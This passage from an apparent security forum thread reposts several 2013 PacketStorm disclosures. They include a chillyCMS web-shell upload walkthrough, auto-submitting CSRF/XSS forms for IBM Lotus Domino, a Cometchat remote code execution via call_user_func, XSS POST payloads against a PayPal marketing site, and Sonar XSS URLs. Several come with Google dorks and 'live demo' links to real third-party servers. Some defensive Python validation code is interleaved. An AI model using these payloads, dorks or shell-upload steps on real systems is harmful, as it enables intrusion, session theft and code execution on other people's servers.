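    return (MS_EYECATCHER + b"\x04\x00" + b"-".ljust(NAME_LEN) + b"\x00" * 12
            + b"\x04\x05" + fromname.ljust(NAME_LEN) + b"\x00\x00" + payload)


# Constructed AD record prefix: the fields up to and including the opcode only.
AD_SAMPLE = AD_EYECATCHER + b"\x01\x01" + b"%11d" % 104 + b"%11d" % 1 + b"\x15\x00\x00\x00"

if __name__ == "__main__":
    print(findings(constructed_message(AD_SAMPLE), "10.0.0.99", {"10.0.0.5"}))
```
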
  16. chillyCMS version 1.3.0 suffers from URL restriction bypass and remote shell upload vulnerabilities.

# Exploit Title: chillyCMS 1.3.0 Multiple Vulnerabilities
# Google Dork: "powered by chillyCMS"
# Date: 15 February 2013
# Exploit Author: Abhi M Balakrishnan
# Vendor Homepage: http://chillycms.bplaced.net/
# Software Link: http://chillycms.bplaced.net/chillyCMS/media/files/chillyCMS_full.zip
# Version: 1.3.0
# Tested on: uWAMP 2.1 (PHP 5.2.17, MySQL 5.5.9), Windows 8
# Video: http://www.youtube.com/watch?v=6B3rND9S75g

# Vulnerability
Failure to Restrict URL Access
chillyCMS uses 302 redirects to restrict access to the unauthorized pages.

# Exploit
Step 1: Create a rule in No-Redirect Add-on: ^http://localhost/chillyCMS/
Step 2: Access http://localhost/chillyCMS/admin/

# Vulnerability
Arbitrary File Upload
chillyCMS/admin/design.site.php page extracts all uploaded ZIP files to chillyCMS/tmp directory

# Exploit
Step 1: Create a ZIP file of the files to be uploaded. Example: Compress shell.php to get shell.zip
Step 2: Upload shell.zip
Step 3: Access the shell at http://localhost/chillyCMS/tmp/shell.php

# History
11 March 2012 - Discovered vulnerability and exploit, contacted the vendor.
12 March 2012 - Vendor responds back, exchanges few mails.
15 November 2012 - Vendor discontinues further development.
15 February 2013 - Published the vulnerabilities and exploits to the public.

# How to reproduce
The latest download from the website was not working on fresh install. An earlier version (1.1.3) has been installed and all the PHP files, except config.php, have been replaced with new files.

Source: PacketStorm
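The upload flaw described in the post above comes from extracting every member of an uploaded ZIP into a web-served directory. The sketch below shows the validation such an upload handler is missing; it is an added example, not chillyCMS code, and the allowed extensions, the size limit and the function names are assumptions, with the sample archives constructed in memory.

```python
import io
import zipfile
from pathlib import PurePosixPath

# Assumption: file types a design/theme package legitimately contains.
ALLOWED_EXT = {".css", ".html", ".js", ".png", ".jpg", ".gif"}
# Extensions a PHP-enabled web server may execute, checked at every position
# so that names such as "logo.php.png" are refused as well.
EXECUTABLE_EXT = {".php", ".php5", ".phtml", ".phar", ".cgi", ".pl"}
MAX_TOTAL_BYTES = 5 * 1024 * 1024


def rejected_members(zip_bytes):
    """Map archive member -> reason; an empty dict means the upload is acceptable."""
    problems = {}
    total = 0
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            path = PurePosixPath(info.filename.replace("\\", "/"))
            suffixes = {s.lower() for s in path.suffixes}
            if path.is_absolute() or ".." in path.parts:
                problems[info.filename] = "path escapes extraction directory"
            elif path.suffix.lower() not in ALLOWED_EXT or EXECUTABLE_EXT & suffixes:
                problems[info.filename] = "file type not allowed"
            total += info.file_size
    if total > MAX_TOTAL_BYTES:
        problems["*"] = "archive expands beyond size limit"
    return problems


def extract_design(zip_bytes, dest_dir):
    """Extract only when every member passed validation.

    dest_dir should be a directory the web server does not execute scripts from.
    """
    problems = rejected_members(zip_bytes)
    if problems:
        raise ValueError(problems)
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        zf.extractall(dest_dir)
        return sorted(zf.namelist())


def make_zip(files):
    """Build a constructed sample archive in memory from {name: bytes}."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in files.items():
            zf.writestr(name, content)
    return buf.getvalue()
```
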
  17. IBM Lotus Domino version 8.5.3 suffers from cross site request forgery, cross site scripting, and redirection vulnerabilities.

Hello list!

These are Cross-Site Request Forgery, Cross-Site Scripting and Redirector vulnerabilities in IBM Lotus Domino. At 30th of November IBM released the advisory concerning these vulnerabilities.

CVE ID: CVE-2012-4842, CVE-2012-4844.
SecurityVulns ID: 12789.

IBM Security Bulletin for Open Redirect and Cross-Site Scripting vulnerabilities: http://www-01.ibm.com/support/docview.wss?uid=swg21608160

-------------------------
Affected products:
-------------------------

Vulnerable are IBM Lotus Domino 8.5.3 and previous versions. These vulnerabilities will be fixed in Domino 9.0 and IBM are still working on other vulnerabilities, about which I've informed them. Lotus Domino 9.0 should be released at 14.03.2013.

Before release of new version all users of affected versions of IBM Lotus Domino are vulnerable to these attacks. And IBM didn't fix these holes in current 8.5.x series, only in new 9.0 series. At that they didn't offer any workaround or mitigation for these issues. But I'll offer such workaround (see below), which can be used before release of version 9.0 with fixes of these vulnerabilities.

----------
Details:
----------

Cross-Site Request Forgery (WASC-09):

Lack of captcha in login form (http://site/names.nsf) can be used for different attacks - for CSRF-attack to login into account (remote login - to conduct attacks on vulnerabilities inside of account), for XSS attacks, for redirect, for Brute Force (which I described in other advisory) and other automated attacks. Which you can read about in the article "Attacks on unprotected login forms" (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2011-April/007773.html).

Examples of attacks on XSS and Redirector vulnerabilities with using of this CSRF vulnerability are provided below.
Cross-Site Scripting (WASC-08):

For attack it's needed to use working login and password at the site (i.e. the attacker needs to use existent account at the site - his own or someone's account, to which he got access via Brute Force vulnerability).

Exploit: http://websecurity.com.ua/uploads/2013/IBM%20Lotus%20Domino%20Redirector.html

<body onLoad="document.hack.submit()">
<form name="hack" action="http://site/names.nsf?Login" method="post">
<input type="hidden" name="Username" value="login">
<input type="hidden" name="Password" value="password">
<input type="hidden" name="RedirectTo" value="javascript:alert(document.cookie)">
</form>
</body>

Redirector (URL Redirector Abuse) (WASC-38):

For attack it's needed to use working login and password at the site (i.e. the attacker needs to use existent account at the site - his own or someone's account, to which he got access via Brute Force vulnerability).

Exploit: http://websecurity.com.ua/uploads/2013/IBM%20Lotus%20Domino%20Redirector.html

<body onLoad="document.hack.submit()">
<form name="hack" action=http://site/names.nsf?Login method="post">
<input type="hidden" name="Username" value="login">
<input type="hidden" name="Password" value="password">
<input type="hidden" name="RedirectTo" value="http://websecurity.com.ua">
</form>
</body>

-----------------
Workaround:
-----------------

My workaround for these vulnerabilities is the next: turn off html-form for login and use Basic Authentication instead.

------------
Timeline:
------------

Full timeline read in the first advisory (http://securityvulns.ru/docs28474.html).

- During 16.05-20.05 I've written announcements about multiple vulnerabilities in IBM software at my site.
- During 16.05-20.05 I've written five advisories via contact form at IBM site.
- At 31.05 I've resent five advisories to IBM PSIRT, which they received and said they would send them to the developers (of Lotus products).
- At 30.11.2012 IBM released their advisory (about Cross-Site Scripting and Redirector holes).
- At 14.12.2012 I've informed SecurityVulns about it.
- At 15.02.2013 I've disclosed these vulnerabilities at my site (http://websecurity.com.ua/5835/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

Source: PacketStorm
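Both issues in the post above come from a login handler that follows whatever the 'RedirectTo' parameter contains. The check below shows how a post-login redirect target can be validated so that neither the 'javascript:' value nor the off-site URL from the post is followed; it is an added example, not IBM's fix or the poster's workaround, and the function name, the 'site.example' host and the fallback path are assumptions.

```python
from urllib.parse import urlsplit


def safe_redirect_target(redirect_to, site_host, default="/"):
    """Return redirect_to only if it stays on site_host, otherwise default."""
    candidate = redirect_to.strip()
    # Browsers drop tabs/newlines and treat "\" like "/", so refuse both up front.
    if any(ord(c) < 0x20 for c in candidate) or "\\" in candidate:
        return default
    try:
        parts = urlsplit(candidate)
    except ValueError:
        return default
    if parts.scheme == "" and parts.netloc == "":
        # Relative target: accept only a single-slash absolute path.
        if candidate.startswith("/") and not candidate.startswith("//"):
            return candidate
        return default
    # Absolute target: http(s) only, and the host must be this site.
    if parts.scheme in ("http", "https") and parts.hostname == site_host.lower():
        return candidate
    return default


if __name__ == "__main__":
    # Constructed inputs; the first two are the RedirectTo values from the post.
    for value in ("javascript:alert(document.cookie)",
                  "http://websecurity.com.ua",
                  "/mail/inbox.nsf",
                  "//other.example/x"):
        print(repr(value), "->", safe_redirect_target(value, "site.example"))
```
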
  18. Cometchat suffers from remote PHP code execution and cross site scripting vulnerabilities.

##################################################################################
Cometchat chat Application All Version Multiple Vulnerabilities
Cometchat is a chat application which in use Vbulletin,Xenforo,SMF,MyBB and other integrated scripts
App Homepage : http://www.cometchat.com
Author(Pentester): B127Y
Special Thanks : Burtay and All Janissaries Team(Burtay,Miyachung,3spi0n,TheMirkin,Michelony,Mectruy)
Jani Exploit id 1 (http://www.janissaries.org/exploits/1)
##################################################################################

1.)Code Execution P0C (modules/chatrooms/chatrooms.php)

call_user_func

call_user_func($_GET['action']);

Can use all php functions and cometchat function without arguments

Live Demo:http://static.cometchat.com/cometchat/modules/chatrooms/chatrooms.php?action=phpinfo

2.)XSS P0C (plugins/handwrite/index.php)

echo

echo <<<EOD
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>{$handwrite_language[0]}</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
<style>
html, body, div, span, applet, object, iframe, h1, h2, h3, h4, h5, h6, p, blockquote, pre, a, abbr, acronym, address, big, cite, code, del, dfn, em, font, img, ins, kbd, q, s, samp, small, strike, strong, sub, sup, tt, var, dl, dt, dd, ol, ul, li, fieldset, form, label, legend, table, caption, tbody, tfoot, thead, tr, th, td {
    margin: 0;
    padding: 0;
    border: 0;
    outline: 0;
    font-weight: inherit;
    font-style: inherit;
    font-size: 100%;
    font-family: inherit;
    vertical-align: baseline;
    text-align: center;
}
html {
    height: 100%;
    overflow: hidden; /* Hides scrollbar in IE */
}
body {
    height: 100%;
    margin: 0;
    padding: 0;
}
#flashcontent {
    height: 100%;
}
</style>
</style>
</head>
<body><object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,0,0" width="100%" height="100%" align="middle" id="main">
<param name="allowScriptAccess" value="sameDomain" />
<param name="movie" value="handwriting.swf" />
<param name="quality" value="high" />
<param name="bgcolor" value="#ffffff" />
<param name="FlashVars" value="tid={$toId}" />
<param name="scale" value="exactFit" />
<embed src="handwriting.swf" width="100%" height="100%" autostart="false" quality="high" bgcolor="#ffffff" FlashVars="tid={$toId}" name="main" align="middle" allowScriptAccess="sameDomain" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer" />
</object></body>
</html>
EOD;

$toId = $_GET['id'];

Live Demo:http://static.cometchat.com/cometchat/plugins/handwrite/index.php?id="><script>alert(document.cookie)</script>

Source: PacketStorm
  19. The www.paypal-marketing.com.hk site suffers from multiple cross site scripting vulnerabilities.

---
Vulnerability # No- 1:

+URL: https://www.paypal-marketing.com.hk/merchant-enquiries/index.php
+Vulnerability Type: Cross Site Scripting (XSS)
+ Form Action : POST
+POST Data Sent to Produce the Bug :
token=1359557986&from_page=en&company_name=%22%3E%3Cscript%3Eprompt%281%29%3C%2Fscript%3E&business_type_other=vulnerable_field&business_need_other=vulnerable_field&contact_person=vulnerable_field&contact_person2=vulnerable_field&phone=vulnerable_field&phone2=vulnerable_field&email=vulnerable_field&email2=vulnerable_field&business_type=1

--Here, the field name with field value vulnerable_field are all vulnerable to cross site scripting. And, the field name (company_name) with value %22%3E%3Cscript%3Eprompt%281%29%3C%2Fscript%3E is also vulnerable and used here to produce the XSS bug here.

+POST Parameters that cause XSS Vulnerability in this Page :
company_name, business_type_other, business_need_other, contact_person, contact_person2, phone, phone2, email, email2

+How to fix :
-- Though this page uses a java script function to validate this form, but it fails to sanitize the all characters which could allow hackers or pen testers to return malicious on webpage like Cross Site Scripting attack

+ Screenshot : Attached with this mail

----------------------------------------------------------------------------
Vulnerability No. # 2 :

+URL: https://www.paypal-marketing.com.hk/merchant-enquiries/index-zh.php
+Vulnerability Type: Cross Site Scripting (XSS)
+ Form Action : POST
+POST Data Sent to Produce the Bug :
token=1359557986&from_page=en&company_name=%22%3E%3Cscript%3Eprompt%281%29%3C%2Fscript%3E&business_type_other=vulnerable_field&business_need_other=vulnerable_field&contact_person=vulnerable_field&contact_person2=vulnerable_field&phone=vulnerable_field&phone2=vulnerable_field&email=vulnerable_field&email2=vulnerable_field&business_type=1

--Here, the field name with field value vulnerable_field are all vulnerable to cross site scripting. And, the field name (company_name) with value %22%3E%3Cscript%3Eprompt%281%29%3C%2Fscript%3E is also vulnerable and used here to produce the XSS bug here.

+POST Parameters that cause XSS Vulnerability in this Page :
company_name, business_type_other, business_need_other, contact_person, contact_person2, phone, phone2, email, email2

+How to fix :
-- Though this page uses a java script function to validate this form, but it fails to sanitize the all characters which could allow hackers or pen testers to return malicious on webpage like Cross Site Scripting attack

+ Screenshot : Attached with this mail

Thanking You
Mahadev Subedi

Source: PacketStorm
  20. Sonar version 3.4.1 suffers from a cross site scripting vulnerability.

Sonar v.3.4.1 => XSS (CWE-79)

+ Vendor info http://www.sonarsource.com/
Dork : intext:"Powered by SonarSource"
=========================================================
+ Author: devilteam.pl
+ WWW: http://devilteam.pl/
=========================================================

XSS:
http://foo.bar/dependencies/index?search="><script>alert(/devilteam.pl/)</script>
http://foo.bar/dashboard/index/41730?did=4&period=3"><script>alert(/devilteam.pl/)</script>
http://foo.bar/reviews/index?review_id=&statuses[]=OPEN&statuses[]=REOPENED&severities[]=&projects[]=&author_login=&assignee_login="><script>alert(/devilteam.pl/)</script>&false_positives=without&sort=&asc=false&commit=Search
http://foo.bar/reviews/index?review_id=&statuses[]=OPEN&statuses[]=REOPENED&severities[]=&projects[]=&author_login="><script>alert(/devilteam.pl/)</script>&assignee_login=&false_positives=without&sort=&asc=false&commit=Search
http://foo.bar/api/sources?resource=<script>alert(/devilteam.pl/)</script>&format=txt

demo:
http://nemo.sonarXsource.org/dependencies/index?search="><script>alert(/devilteam.pl/)</script>
https://dev.eclipXse.org/sonar/dependencies/index?search="><script>alert(/devilteam.pl/)</script>
https://gcrcwin.cXacr.med.umich.edu/sonar/dependencies/index?search="><script>alert(/devilteam.pl/)</script>
http://csci3601sp12.mXorris.umn.edu:2020/sonar/dependencies/index?search="><script>alert(/devilteam.pl/)</script>
https://redbox-build.cqXu.edu.au/sonar/dependencies/index?search="><script>alert(/devilteam.pl/)</script>

greetz: cxsec.org

Source: http://cxsecurity.com/blad/WLB-2013020088

Source: PacketStorm
  21. 1. As far as I knew, you also post a link to the vulnerable target. 2. Specify the method. 3. Stop posting easy challenges just for the sake of making posts. 4. Why so many requirements? What importance would hostname, datadir, basedir have? 6. What role does datadir have? And basedir? 7. Why are you racist? //Edit: PM Sent.
  22. Yes, the method is good when you need to select each column.
  23. It's down. The connection has timed out